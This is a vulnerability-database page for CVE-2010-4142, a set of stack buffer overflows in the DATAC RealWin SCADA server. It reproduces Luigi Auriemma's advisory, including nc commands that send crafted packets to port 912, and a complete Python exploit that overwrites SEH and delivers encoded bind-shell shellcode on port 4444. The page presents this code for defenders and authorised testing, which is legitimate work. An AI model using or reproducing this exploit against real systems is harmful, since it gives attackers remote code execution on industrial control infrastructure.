CVE-2010-4142
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow
Source: http://aluigi.org/adv/realwin_1-adv.txt
#######################################################################
Luigi Auriemma
Application: DATAC RealWin
http://www.dataconline.com/software/realwin.php
http://www.realflex.com
Versions: <= 2.0 (Build 6.1.8.10)
Platforms: Windows
Bugs: A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
B] stack overflow in SCPC_TXTEVENT
Exploitation: remote, versus server
Date: 15 Oct 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
"RealWin is a SCADA server package for medium / small applications."
#######################################################################
=======
2) Bugs
=======
-----------------------------------------------------------
A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
-----------------------------------------------------------
The service of the server running on port 912 is vulnerable to a
stack based buffer-overflow caused by the usage of sprintf() for
building a particular string with the data supplied by the attacker:
sprintf(
stack_buffer,
"C:\\Program Files\\...path_of_RealWin...\\data\\crt\\fwd\\tel\\%s.%d",
attacker_string,
attacker_16bit_number);
----------------------------------
B] stack overflow in SCPC_TXTEVENT
----------------------------------
The same server is vulnerable also to another stack based overflow
caused by the usage of strcpy() with the data supplied by the attacker.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/realwin_1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15259.zip (realwin_1.zip)
nc SERVER 912 < realwin_1a.dat
nc SERVER 912 < realwin_1b.dat
nc SERVER 912 < realwin_1c.dat
#######################################################################
======
4) Fix
======
No fix.
#######################################################################DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow
# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 912 by default
# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444,
shellcode =(
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"
"\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"
"\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"
"\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"
"\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"
"\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"
"\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"
"\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"
"\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"
"\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"
"\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"
"\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"
"\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"
"\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"
"\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"
"\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"
"\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"
"\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"
"\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"
"\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"
"\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"
"\x3d\xaa\x09\x02\x41\x19\x29\x07")
head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
junk = "\x41" * 228
next_seh = "\xeb\x06\x90\x90" # overwrites next seh
seh = "\xea\xe3\x02\x40" # seh overwritten at 232 bytes - 4002e3ea
nops = "\x90" * 20 # nop sled
junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode
print "\n===================================="
print "DATAC RealWin 1.06 Buffer Overflow"
print "Written by Blake"
print "Discovered by Luigi Auriemma"
print "Tested on Windows XP SP3"
print "====================================\n"
print "[*] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[*] Sending payload"
s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")
s.close()
print "[*] Payload sent"
raw_input("[*] Press any key to exit...\n")DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)
Source code queued for fetch โ refresh in a moment.
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)
Source code queued for fetch โ refresh in a moment.
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Source fetch failed: fetch_error โ view the original via the link above.
Source code queued for fetch โ refresh in a moment.
References
- http://aluigi.org/adv/realwin_1-adv.txt
- http://secunia.com/advisories/41849
- http://www.exploit-db.com/exploits/15259
- http://www.exploit-db.com/exploits/15337
- http://www.securityfocus.com/bid/44150
- http://aluigi.org/adv/realwin_1-adv.txt
- http://secunia.com/advisories/41849
- http://www.exploit-db.com/exploits/15259
- http://www.exploit-db.com/exploits/15337
- http://www.securityfocus.com/bid/44150
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.